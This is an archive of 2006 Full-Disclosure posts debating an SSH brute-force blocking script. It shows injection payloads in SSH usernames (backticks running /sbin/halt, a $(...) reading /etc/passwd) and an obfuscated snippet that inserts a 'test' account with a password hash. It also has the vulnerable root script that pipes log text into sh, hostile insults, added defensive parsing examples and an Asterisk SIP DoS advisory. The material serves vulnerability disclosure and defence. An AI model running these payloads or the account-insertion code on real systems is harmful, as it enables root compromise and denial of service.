Try it instead of mouthing off about it. "Someone can possibly inject
tartar sauce into a sealed jar." Is it possible? Sure, it probably is;
show me though instead of yapping off. Someone else griped, "someone can
craftily insert your own address into an IP table." Look, if someone is
THAT stupid of an admin to not test things first, modify it to their
needs, and gets themselves locked out of their own machine, they have no
business on that machine. Period.







Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread J. Oquendo

Tavis Ormandy wrote:


However, it is certainly possible. Here is an example.

#!/bin/sh
command='$(x=$(pwd|head${IFS}-c1);$(cat[EMAIL PROTECTED])${x}etc${x}passwd)'
ssh -o BatchMode yes a a $command@$1

Which produces log entries like this:
 
Nov 28 15:14:15 insomniac sshd[5897]: pam_succeed_if(sshd:auth): error retrieving information about user a a $(x=$(pwd|head${IFS}-c1);$(cat[EMAIL PROTECTED])${x}etc${x}passwd)

Nov 28 15:14:15 insomniac sshd[5897]: Failed password for invalid user a a 
$(x=$(pwd|head${IFS}-c1);$(cat[EMAIL PROTECTED])${x}etc${x}passwd) from 
127.0.0.1 port 47403 ssh2

Note that the 13th field both contains a dot and is entirely controlled
by me. This string is placed in /etc/hosts.deny by the script after
executed by cron.

The $1 in the awk script below is the entire string, which is piped
unsanitised into /bin/sh:

awk '!/#/ && /\./ && !a[$0]++
{print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT"}' /etc/hosts.deny |\
awk '/iptables/ && !/#/ && !/-s  -i/'|sh

The results are obvious.
  


Incorrect, did you look at the fix? It isn't unsanitized as you state:

Firstly, the data being passed is not coming through via /var/log/secure or
/var/log/auth*; it's coming in via /etc/hosts.deny


function IPT {

grep -E '(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}' /etc/hosts.deny|\

sed 's/::://g'|\
awk '!/#/ && /\./ && !a[$0]++
{print "iptables -A INPUT -s "$1" -i eth0 -d 208.51.101.194 -p TCP --dport 22 -j REJECT"}'|\

awk '/iptables/ && !/#/ && !/-s  -i/'|sh

}

[EMAIL PROTECTED] ~]# cat testing.deny
89.96.238.226
219.146.59.225
211.97.194.148
220.110.34.44
2383274298734
sakjdhasiuwe
hacker
aaa
bbb
ccc
0wn3d
[EMAIL PROTECTED] ~]# grep -E '(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}' testing.deny

89.96.238.226
219.146.59.225
211.97.194.148
220.110.34.44

So the buck stops there before it is put into the shell.




Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread J. Oquendo

Tavis Ormandy wrote:

On Tue, Nov 28, 2006 at 10:56:33AM -0500, J. Oquendo wrote:
  

Incorrect did you look at the fix? It isn't unsanitized as you state:



J, you have made an attempt to fix it, but is is not sufficient.

An attacker can still add arbitrary hosts to the deny list.

Thanks, Tavis.

  
Right... And as I stated in a different post... If an inexperienced
admin allows that, it is on them. My attempt at making what I NEEDED and
thought was helpful succeeded. If someone wants to nc insert arbitrary
addresses, so be it. No different than someone spoofing random addresses
at a firewall. What are you going to do, sift through every single
address touching your network? Heck, for what you just claimed, "An
attacker can still add arbitrary hosts to the deny list. ... it is not
sufficient" ... TCP/IP is not sufficient with all of its issues. Give me
a break.



Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread J. Oquendo

Tavis Ormandy wrote:

On Tue, Nov 28, 2006 at 04:02:36PM +, Tavis Ormandy wrote:
I notice you also haven't solved the local privilege escalation, this can
be abused by local users to gain root by attempting to login with the
username set to a valid passwd entry and then winning the race condition
by creating a symlink to the system passwd file (of course, there are
dozens of other attacks).

Thanks, Tavis.


And just what on God's earth does SOMEONE LOGGING IN WITH USERNAME SET
TO A VALID PASSWORD ENTRY have to do with this script? Let me take my
script out of the equation for a minute. SOMEONE LOGS IN WITH A
USERNAME SET TO A VALID PASSWORD ENTRY, don't you think this is a
problem with the system they're on? Please explain to me how, because I'm
seriously curious to know how you envision this happening with this
script of mine.


Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227
awk '($5=="Illegal"||$6=="Illegal") && $9=="from"{print $10}'

Would stop the insertion attack and only print out the tenth field if
fields 5, 6 and 9 match "Illegal user ... from".


So that would pretty much minimize the attack on name insertion. If I 
wanted to I could also make sure that if someone came after field 10, 
then ignore the entire line:

Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227

But before you shoot back let me send your response for you:

Tavis Ormandy will write:
 Someone could log in using: Illegal User foo from 

$OWNIPADDRESS@host which would make an entry:
 Nov 27 16:31:21 local sshd[67010]: Illegal user  dd from  Illegal User 

foo from $OWNIPADDRESS 213.134.128.227

So let me restate. I could modify it to look at lines 5, 6, and 9 ...
Take a look at the tenth column and if anything comes after
that... Ignore that entire line... Should I have done so? Maybe... Will I
do so... Maybe...


But wait there's more... Before you respond back Tavis, I will do so for 
you:


Tavis Ormandy will write:
 Someone could cause a race condition in awk that will allow peanut 
butter to seep into my colo


Sorry can't help you there.

As to a fix to someone injecting ranDumb addresses. That same awk 
statement above will work but if they're doing some netcat voodoo, then 
feel free to shoot off another email on how my script broke TCP/IP entirely.




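Added example for this thread, not the Sharpener script or any code from the posts: a POSIX sh parser that takes the attacker address from the fixed trailer sshd appends to a failed-login line, validates it as a dotted quad, and counts failures per address without ever piping log text into sh, which covers both the "13th field" injection and the "add arbitrary hosts to the deny list" point raised above. The log lines are constructed; naive_src_ip is a simplified stand-in for the field-number parsing discussed in the thread, added only for contrast.

```shell
#!/bin/sh
# Added example for this thread, not the Sharpener script: take the
# source address from the fixed trailer sshd appends to a failed-login
# line, validate it, and count failures per address. No log text is ever
# piped into sh; an attacker-chosen username stays data.

# Constructed sample log lines. Line 3 carries backticks in the username
# (the injection discussed in the thread); line 4 carries a fake
# "from ... ssh2" fragment meant to get an innocent address blocked.
SAMPLE_LOG=$(cat <<'EOF'
Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227
Nov 27 16:31:25 local sshd[67011]: Failed password for invalid user admin from 213.134.128.227 port 40113 ssh2
Nov 27 16:31:30 local sshd[67012]: Failed password for invalid user foo bar `id` from 10.0.0.9 port 40114 ssh2
Nov 27 16:31:35 local sshd[67013]: Failed password for invalid user x from 192.0.2.1 port 1 ssh2 from 10.0.0.9 port 40115 ssh2
Nov 27 16:31:40 local sshd[67014]: Accepted publickey for ops from 198.51.100.7 port 50000 ssh2
Nov 27 16:31:45 local sshd[67015]: Failed password for invalid user root from 213.134.128.227 port 40116 ssh2
EOF
)

# Strict dotted-quad check: digits and dots only, exactly four octets,
# each 0-255 with no leading zeros. The body is a subshell so the IFS
# change does not leak to the caller.
valid_ipv4() (
    case $1 in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    IFS=.
    set -- $1
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        case $octet in 0?*) return 1 ;; esac
        [ "$octet" -le 255 ] || return 1
    done
    return 0
)

# Print the validated source address of one failed-login line, or print
# nothing and fail. sshd itself appends " from <ip> port <n> ssh2" (older
# versions: " from <ip>") at the very end of the line, so anchoring on
# the end skips whatever the attacker typed as a username.
extract_src_ip() {
    case $1 in
        *"Failed password for "*|*"Illegal user "*|*"Invalid user "*) ;;
        *) return 1 ;;
    esac
    _ip=$(printf '%s\n' "$1" | sed -n \
        -e 's/.* from \([0-9.]*\) port [0-9]* ssh2$/\1/p' \
        -e t \
        -e 's/.* from \([0-9.]*\)$/\1/p')
    [ -n "$_ip" ] || return 1
    valid_ipv4 "$_ip" || return 1
    printf '%s\n' "$_ip"
}

# Simplified stand-in for the thread's field-number parsing, kept only
# for contrast: it takes the word after the first "from", which sits
# inside the attacker-controlled username.
naive_src_ip() {
    printf '%s\n' "$1" |
        awk '{ for (i = 1; i < NF; i++) if ($i == "from") { print $(i + 1); exit } }'
}

# Read sshd log lines on stdin; print each address that failed at least
# $1 times. A blocker built on this would pass each address as an
# argument (iptables -A INPUT -s "$ip" ...), never through "| sh".
collect_offenders() {
    while IFS= read -r _line; do
        extract_src_ip "$_line" || :
    done | sort | uniq -c | awk -v t="$1" '$1 >= t { print $2 }'
}

printf '%s\n' "$SAMPLE_LOG" | collect_offenders 2
```

On the sample above, naive_src_ip reports the innocent 192.0.2.1 for line 4 while extract_src_ip reports the real 10.0.0.9.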

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread J. Oquendo

Anders B Jansson wrote:

Just one possibly silly question.

Why are you working so hard to do this with complex scripts and stuff?

I just wrote a little C snippet that runs on the firewall.
All servers allowing external ssh send a copy of ssh auth to a port
on the firewall.

If it detects a brute force it adds the host to the block list and
everything from that host is silently dropped.

Added a whitelist function to avoid DOS attempts.

Works perfect, and adds community service by letting the trawlers
hang until they timeout.
  
The purpose of this wasn't to reinvent the wheel. It was to allow those 
using the tool to report the addresses of anyone brute forcing ssh. 
These addresses are going to be posted for others to see. Something like 
an RBL for brute forcers.




[Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo
For those interested, I wrote a program called Sharpener which is an SSH 
brute force blocking tool that also reports back the offenders' 
addresses. I have begun posting the information on the attackers as well 
as sending out messages (whenever possible) to the admins of these 
domains. Think of it as an RBL for SSH attackers. The goal is to 
identify these machines in order for others to implement safeguards 
(ACL's) against these hosts. Feel free to comment/complain.



http://www.infiltrated.net/sharpener (tool)
http://www.infiltrated.net/bruteforcers (offenders)


Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

Tavis Ormandy wrote:


Nice work, really subtle rootkit. I like the email phone-home.

Here's an exploit.

#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim

  


Since you seem to be clueless I'll answer step by step. Here goes idiot. 
(Sinful to see someone so clueless coming from Gentoo... Guess it goes 
with the romper room Linux territory)


if [ "`whoami`" != "root" ]

   then echo "This script needs to run under the root user"
exit

else

if [ -e /tmp/hosts.deny ]

   then
rm /tmp/hosts.deny
fi
/

Check to see if the user is root. If not, tell the user "Hey dumbass, you
need to be root"; if the user is root, continue.

/
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru > /tmp/hosts.deny
diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ && />/{print $2}' >> /etc/hosts.deny

/

There is no hocus pocus here. Look at /var/log/secure and find the term
"error retrieving" and print the next line, 13th column. Then sort it and
print the unique entries into /tmp/hosts.deny. After you do this, compare
/tmp/hosts.deny with /etc/hosts.deny and put the differences not in
/etc/hosts.deny into /etc/hosts.deny.

/
OS=$( uname|sed -n '1p')
/

This is a no brainer. No voodoo there.

# IPTables function...
ifaddr=`ifconfig -a|awk '/inet/ && !/inet6/ && !/127.0/ && !/192.168/{print $2}'|sed 's/addr\://g'`


Do an ifconfig on the machine. Ignore the word inet, inet6, 127.0, 
192.168, print
the second field, and replace the term addr: with nothing. No voodoo 
here jackass.


/
function IPT {

awk '!/#/ && /\./ && !a[$0]++
{print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT"}' /etc/hosts.deny |\

awk '/iptables/ && !/#/ && !/-s  -i/'|sh

}
/

This is such a hacker thing coming now. You caught me.

Ignore comments !/#/
print anything with a decimal /\./
make this unique !a[$0]++ (!a[$0]++ = uniq ... shhh don't expose my awk 
hacking)


/
if [ $OS = Linux ]

   then
   IPT

fi
/

This is where I guess I hack the world. Check the OS and if it's Linux, 
then


cat /etc/hosts.deny

Ignore comments !/#/
print anything with a decimal /\./
make this unique !a[$0]++ (!a[$0]++ = uniq ... shhh don't expose my awk 
hacking)
then print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 
22 -j REJECT

$1 = IP address
$ifaddr = IP address of the interface

/
echo Copying sharpener to /usr/local/bin
sed -n '1,67p' ./sharpener > /usr/local/bin/sharpener
echo fi >> /usr/local/bin/sharpener
rm ./sharpener
/

Here goes the voodoo... You ready?

print lines from 1 through 67 of this same file but put it in 
/usr/local/sharpener

add a fi to that same file then remove the original

/
sleep 2
echo ""
echo "Adding Sharpener to cron"
echo "0,10,20,30,40,50 * * * * /usr/local/bin/sharpener"

if [ -e /var/spool/cron/root ]

   then
echo "0,10,20,30,40,50 * * * * /usr/local/bin/sharpener" >> /var/spool/cron/root


else
if [ -e /var/cron/tabs/root ]

   then
   echo "0,10,20,30,40,50 * * * * /usr/local/bin/sharpener" >> /var/cron/tabs/root


   fi
fi

/

Add it to cron


/

awk '!/192.168/ &&
!/127./ &&
!/#/ &&
!/172.32/{print $1" has been blocked via SSH"}' /etc/hosts.deny |\

mail -s "Sharpener" [EMAIL PROTECTED]

fi
/

Print out the first column of /etc/hosts.deny ... Ignore 127., ignore #, 
and ignore 172.32
then mail it to an evil hacker site so they can traverse telekinetically 
into your machine.


Right.


Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

Tavis Ormandy wrote:

On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
  

Tavis Ormandy wrote:


Nice work, really subtle rootkit. I like the email phone-home.

Here's an exploit.

#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim

 
  
Since you seem to be clueless I'll answer step by step. Here goes idiot. 
(Sinful to see someone so clueless coming from Gentoo... Guess it goes 
with the romper room Linux territory)

/
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru > /tmp/hosts.deny



insecure temporary file creation, race condition if a user can create
that file between the unlink and the open.

$ ssh error retrieving@localhost  ssh '`0wn3d`'@localhost
$ awk '/error retrieving/{getline;print $13}' /var/log/authlog
`0wn3d`

Oops.

Thanks, Tavis.
  


So again dumbass...

Look at the script. Although YOU'RE opening /var/log/authlog, what is the
script opening? Please tell me you're really not that stupid. And if
someone else decided to modify this script, what does that have to do
with what I posted? How exactly is my script a backdoor as you claim?
Enquiring minds want to know this since you claim it's a backdoor. Please
tell me, outside of your modification, how this is going to backdoor someone.



Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

gabriel rosenkoetter wrote:

On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
  
Since you seem to be clueless I'll answer step by step. Here goes idiot. 
(Sinful to see someone so clueless coming from Gentoo... Guess it goes 
with the romper room Linux territory)



Uh... actually, no. The provided exploit Will work, and you're the
idiot.

Here, let me show you.

You do this:

  

/
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru > /tmp/hosts.deny
diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ && />/{print $2}' >> /etc/hosts.deny

/

There is no hocus pocus here. Look at /var/log/secure and find the term
"error retrieving" and print the next line, 13th column. Then sort it and
print the unique entries into /tmp/hosts.deny. After you do this, compare
/tmp/hosts.deny with /etc/hosts.deny and put the differences not in
/etc/hosts.deny into /etc/hosts.deny.



What will be in column 13 when Tavis does this:

  

Tavis Ormandy wrote:


Here's an exploit.

#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim
  


Why, the shelled-out output of `/sbin/halt`!

Or, hey, anything he or I care to put inside backticks. You'll
execute it blindly, as root, on your system.

Kids, don't use this script. Please.
  


Jesus Christ, people get stupider by the moment. W/e, the script is there
for scrutiny; there is no hidden voodoo. If you DO want to see hidden
voodoo, here it is...




Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

gabriel rosenkoetter wrote:

On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
  
Since you seem to be clueless I'll answer step by step. Here goes idiot. 
(Sinful to see someone so clueless coming from Gentoo... Guess it goes 
with the romper room Linux territory)



Uh... actually, no. The provided exploit Will work, and you're the
idiot.

Here, let me show you.

You do this:

  

/
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru > /tmp/hosts.deny
diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ && />/{print $2}' >> /etc/hosts.deny

/

There is no hocus pocus here. Look at /var/log/secure and find the term
"error retrieving" and print the next line, 13th column. Then sort it and
print the unique entries into /tmp/hosts.deny. After you do this, compare
/tmp/hosts.deny with /etc/hosts.deny and put the differences not in
/etc/hosts.deny into /etc/hosts.deny.



What will be in column 13 when Tavis does this:

  

Tavis Ormandy wrote:


Here's an exploit.

#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim
  


Why, the shelled-out output of `/sbin/halt`!

Or, hey, anything he or I care to put inside backticks. You'll
execute it blindly, as root, on your system.

Kids, don't use this script. Please.

  


Here is your voodoo backdoor, moron

file=`awk 'NR==59 {gsub(//,);print $3}' /usr/include/paths.h`
sed -n '1p' $file|awk -F : 
'BEGIN{OFS=:}{$1=test}1{$2=\$1\$N6M3yuA9\$JXTgD8q8apf1fgfUT44hW1}2' 
 $file

file2=`awk 'NR==74 {gsub(/,/,);print $8}' /usr/include/sysexits.h`
sed -n '1p' $file2|sed 's/[^:]*:/test:/'  $file2
who=`sed -n '58p' sysexits.h |awk '{print $5}'`
what=`sed -n '60p' wireless.h |awk 'gsub(/,/, ){print $4}'`
when=` sed -n '60p' wireless.h |awk 'gsub(/,/, //){print $4}'`
$what|$who full-disclosure@lists.grok.org.uk



Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

Tavis Ormandy wrote:


I'm not sure what you mean by modification, I simply substituted the name
for the logfile I use.

Thanks, Tavis.

  
So for the third time now. Explain to me how I am backdooring someone's 
system.


[EMAIL PROTECTED] include]# uname -a
Linux int-mrkt 2.6.18-1.2200.fc5 #1 Sat Oct 14 16:59:26 EDT 2006 i686 
i686 i386 GNU/Linux
[EMAIL PROTECTED] include]# awk '/error retrieving/{getline;print $13}' 
/var/log/secure|sort -ru

222.171.20.252
211.137.74.58

My logs parse out addresses not named and there is no redirection going 
on. If you want to say "Hey... It should be written as such" then gladly 
do so. But posting "hey you're backdooring the planet" like a jackass is 
moronic. Line by line on my machines it does what it needs to do and it 
does so just fine. Did you see any notes of Gentoo in the comments? I 
didn't because I don't use it, never have, don't care to. So if it does 
something different on Gentoo, let's use the brain for a moment... "Gee 
this works horrible on Gentoo. The author is a shitty writer... I think 
I should let him know" as opposed to "Oh my gawd he's backdooring you."



--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams






Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

Tavis Ormandy wrote:

On Mon, Nov 27, 2006 at 04:21:19PM -0500, gabriel rosenkoetter wrote:
  

Mea culpa. Tavis's exploit doesn't do scary things, although he's
right you should really be doing a bit more sanitization of (evil)
user-supplied input, given that you're (insisting that you) run as
root.



Gabriel, I was referring to this line:

awk '!/#/ && /\./ && !a[$0]++
{print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22
-j REJECT"}' /etc/hosts.deny |\
awk '/iptables/ && !/#/ && !/-s  -i/'|sh

(note the |sh), $1 can be controlled by specially crafted attempted
logins.

Thanks, Tavis.

  


That specially crafted attempt would be a HUGE raping of TCP/IP. How do 
you suppose it would be possible for someone to insert "0wn3ed" or any 
other variable outside of an IP address?


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams




Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

gabriel rosenkoetter wrote:

You are dealing with output you can't trust there. $13 could be
anything, including \n`rm -rf /`. Later on, you pass $13,
unstripped of newlines, backticks, or any number of other special
character to a shell running as uid 0. That shell will proceed to
execute whatever we would like it to, where we are the remote
attacker who doesn't even have an account.

  
No it can't. Even if it was rm -rf someone placed in, did you not notice 
my grep statement? Only print items with a decimal. At no given point 
anywhere on the 13th column, whether it's Solaris, NetBSD, FreeBSD, would 
there be an option for someone to craft anything...


FreeBSD
-bash2-2.05b$ uname -a
FreeBSD ethos.disgraced.org 5.4-RELEASE-p14 FreeBSD 5.4-RELEASE-p14 #1: 
Thu May 11 01:34:54 CDT 2006 
[EMAIL PROTECTED]:/usr/obj/usr/src/sys/ETHOS  i386

-bash2-2.05b$ sudo awk '{print $13}' /var/log/auth.log|sort -ru
57354
57340
57335
56253
55125
49211
40334
37188
3508
33875
33635
33454
32798
3137
2895
2638
2408
2301
2114
-

OpenBSD
# uname -a
OpenBSD hades.disgraced.org 4.0 GENERIC#1 i386
# awk '{print $13}' /var/log/authlog|grep \.|sort -ru
63.243.158.221
61.129.85.230
220.132.113.163
219.149.211.49
213.195.75.41
206.210.96.56


I don't believe the suggestion was ever that you had malicious
intent, but rather that you have very horrible coding security
habits.

  
This should have been stated to the list as opposed to "You're 
backdooring people".



I'm disinclined to sort out which of your machines I can get root on
right now because you are running this script, but I would expect
that someone reading this mailing list is already on the way and
would strongly advise that you disable those cron jobs.
  

I'll give you addresses if you'd like to take a shot at it.


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams




Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

gabriel rosenkoetter wrote:

On Mon, Nov 27, 2006 at 04:41:43PM -0500, J. Oquendo wrote:
  
That specially crafted attempt would be a HUGE raping of TCP/IP. How do 
you suppose it would be possible for someone to insert "0wn3ed" or any 
other variable outside of an IP address?



That's impossible.

Putting extra spaces in the log entry is easy.

  
And extra spaces would do what... If the point is to insert a name 
somewhere in order to send out information from the 13th column in 
authlog, then I'll tell you what, you name the system it can happen on 
and I will personally apologize publicly. It is not doable. I'd have a 
better chance of hanging with Santa while I bang Angelina Jolie while 
Denise Richards watches me.



--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams




Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

Michael Holstein wrote:
That specially crafted attempt would be a HUGE raping of TCP/IP. How do 
you suppose it would be possible for someone to insert "0wn3ed" or any 
other variable outside of an IP address?



Remember the (in)famous quote "...that vulnerability is purely 
theoretical..."?


I think the point is you don't use $language to split a bunch of fields, 
and then pipe them back through /bin/sh without making sure they're not 
malicious.


Doesn't matter that you can't think of a way to make them malicious .. 
somebody else will find one. It's safer to just assume it'll happen and 
always sanitize variables before you {do_stuff;} with them.


(my $0.02)

~Mike.


  
So I ask you too... Find me any Unix derivative that will allow someone 
to pass a name, word, place, etc. into the 13th column of authlog, then 
bypass grep which is grep'ing out for decimals.



--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



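The thread above turns on whether the 13th column of an auth log can hold anything but an address, and whether a grep for a dot is enough of a guard. As an added example, not code from the thread or from the blocking tool, the POSIX sh script below runs the fixed-column extraction and a tail-anchored, validated extraction over three constructed sshd lines in OpenSSH's "Failed password for invalid user ... from ... port ... ssh2" format (the format is assumed; the lines and addresses are made up here), one of them carrying the space-and-backtick username from Tavis's message.

```shell
#!/bin/sh
# Added example, not code from the thread. Constructed sshd lines: the first
# is an ordinary failed login; the second carries the username from Tavis's
# message; the third carries a username that contains a dotted quad. An
# unauthenticated client chooses the username and it may contain spaces, so
# the position of the real address in the line is not fixed.
SAMPLE_LOG='Nov 27 16:21:19 int-mrkt sshd[4120]: Failed password for invalid user admin from 222.171.20.252 port 40101 ssh2
Nov 27 16:22:01 int-mrkt sshd[4133]: Failed password for invalid user foo bar `/sbin/halt` from 211.137.74.58 port 40102 ssh2
Nov 27 16:23:00 int-mrkt sshd[4140]: Failed password for invalid user x y 1.2.3.4 from 10.99.99.99 port 40103 ssh2'

# The tool's approach: trust that the address is whitespace-separated field
# 13. On the second line that field is the backtick expression; on the third
# it is 1.2.3.4, which contains a dot and so would survive a "/\./" filter
# even though it is not the client's address.
column13() {
    awk '{print $13}'
}

# Hardened extraction (reads log lines on stdin): locate the trailing
# "from <addr> port <n>" of the message by taking the LAST "from", since the
# username precedes it and may itself contain that word, then accept only a
# syntactically valid IPv4 address. Output is one address per line.
extract_ips() {
    awk '
    {
        for (i = NF; i > 0; i--) if ($i == "from") break
        if (i == 0 || i + 2 > NF || $(i + 2) != "port") next
        ip = $(i + 1)
        if (ip !~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) next
        split(ip, o, ".")
        ok = 1
        for (k = 1; k <= 4; k++) if (length(o[k]) > 3 || o[k] + 0 > 255) ok = 0
        if (ok && !seen[ip]++) print ip
    }'
}

# Safe consumption: each validated address becomes a single argv element of
# the blocking command. Nothing is re-parsed by sh, so backticks, newlines or
# semicolons in the log can never become code. The command is a parameter so
# the example runs without touching a firewall.
block_each() {
    while IFS= read -r ip; do
        "$@" "$ip"
    done
}

printf 'naive column-13 extraction:\n'
printf '%s\n' "$SAMPLE_LOG" | column13
printf 'anchored, validated extraction:\n'
printf '%s\n' "$SAMPLE_LOG" | extract_ips | block_each echo "would block"
```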

[Full-disclosure] DoS kiddiots can face 10 years in jail

2006-11-13 Thread J. Oquendo

[forwarded]

Denial of service attackers face 10 years in jail 


http://www.zdnetasia.com/news/security/0,39044215,61966964,00.htm

By Andy McCue
Special to ZDNet Asia
November 13 2006 

Denial of service attackers in the United Kingdom now face up to 10 
years in jail with updated computer crime laws coming into force this 
week as part of the new Police and Justice Act 2006.


The long-overdue updating of the 1990 Computer Misuse Act also increases
the sentence for hacking a computer from a maximum of six months to two 
years' imprisonment.


Section three of the 1990 CMA is replaced by section 34 of the Police 
and Justice Act 2006, which now more explicitly covers denial of service
attacks as unauthorized acts with intent to impair operation of a 
computer.


The act says a person is guilty of an offence if at the time of any 
attack they have the intent to impair the operation of any computer, 
prevent or hinder access to any program or data held on a computer, or 
impair the operation of a program or the reliability of data.


Confusion had arisen over whether denial of service attacks were covered
in the original CMA in the case of a teenager originally cleared in 2005
of crashing the email server of his former employer by overwhelming it 
with an 'email bomb' containing millions of messages.


That ruling was later overturned and David Lennon was found guilty 
earlier this year of breaking the CMA, and was sentenced to a two-month 
curfew.


The new law also makes it an offence to supply or make available any 
software or tools that could be used to commit hacking or denial of 
service attacks, and those found guilty under this section of the act 
face up to two years in jail.


As part of the Police and Justice Act 2006 the police IT organization 
Pito has been abolished and its functions will be taken over by the new 
National Policing Improvement Agency.


New powers under the Act will give police the right to access passenger 
and crew data on any journeys within the United Kingdom or arriving in 
the United Kingdom.


Andy McCue of Silicon.com reported from London.

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams




[Full-disclosure] Locking down (L)AMP from XSSKiddiots

2006-11-10 Thread J. Oquendo

I was bored...

www.infiltrated.net/modsecips.html

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams




[Full-disclosure] Asterisk Local and Remote Denial of Service Vulnerability

2006-10-30 Thread J. Oquendo


Product: Asterisk Open Source PBX
Impact: Multiple Local and Remote Denials of Service
Version(s): All versions prior to 1.2.13
Author: Jesus Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'


I. BACKGROUND
Asterisk is an Open Source PBX which runs on Linux, BSD, Solaris and MacOSX
that provides all of the features in a standard PBX. Asterisk does voice over
IP and can interoperate with almost all telephony equipment.

II. DESCRIPTION
A sequence of malformed (pre-defined) packets can cause different denials of
service on Asterisk. The attack is both local and remote. These denials of
service can range from the Asterisk server shutting down, channels being
opened and filling up queues, log file denials of service by filling space
with errors and ranDumb messages, voicemail space allocation being filled,
and ICMP denials of service.

III. SOLUTION
Versions 1.2.13 and greater are no longer vulnerable to the attack and users
are urged to update to 1.2.13 or better.

IV. SOURCE
http://www.infiltrated.net/asteroid/asteroidv1.tar.gz

V. POSSIBILITIES
While the initial packet creation tool was tested on Asterisk, it was not
targeted towards Asterisk but at the SIP protocol. Asterisk was used merely
for Wireshark packet captures in order to re-create newer packets. The
Asteroid SIP denial of service tool could also affect other products that run
the SIP protocol including soft phones, other PBX's, etc.

VI. MENTIONS
Thanks to Kevin P. Flemming and the guys at Asterisk for fixing this promptly,
Dan York for getting people to pay attention, Tim Donahue for his Perl
pointers, vgersh99 (aka vlad) for nawk pointers, PHV, Annihilannic, p5wizard,
Anthony LaMantia, Tzafir Cohen, and the others on the Asterisk-Dev list.

VII. TESTBED
Tested on Solaris, FreeBSD, Linux (SuSE, CentOS, Gentoo, Debian) distributions
running various versions of Asterisk.

VIII. CHECKSUMS

$ md5 asteroidv1.tar.gz 
MD5 (asteroidv1.tar.gz) = b32c56ab4004d2a75109d9e8d824

$ sha1 asteroidv1.tar.gz 
SHA1 (asteroidv1.tar.gz) = 0345fc7e423bddb8d9aa5fae431c0715db70a879



=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743

How a man plays the game shows something of his
character - how he loses shows all - Mr. Luckey




[Full-disclosure] Asteroid SIP Denial of Service Tool

2006-10-28 Thread J. Oquendo
Asteroid is a SIP denial of service attack tool which affected older versions
of Asterisk, the Open Source PBX, and may affect other products running the SIP
protocol. There are thousands of custom (mis)crafted SIP packets which were
sent to older versions of Asterisk that caused errors stopping Asterisk.

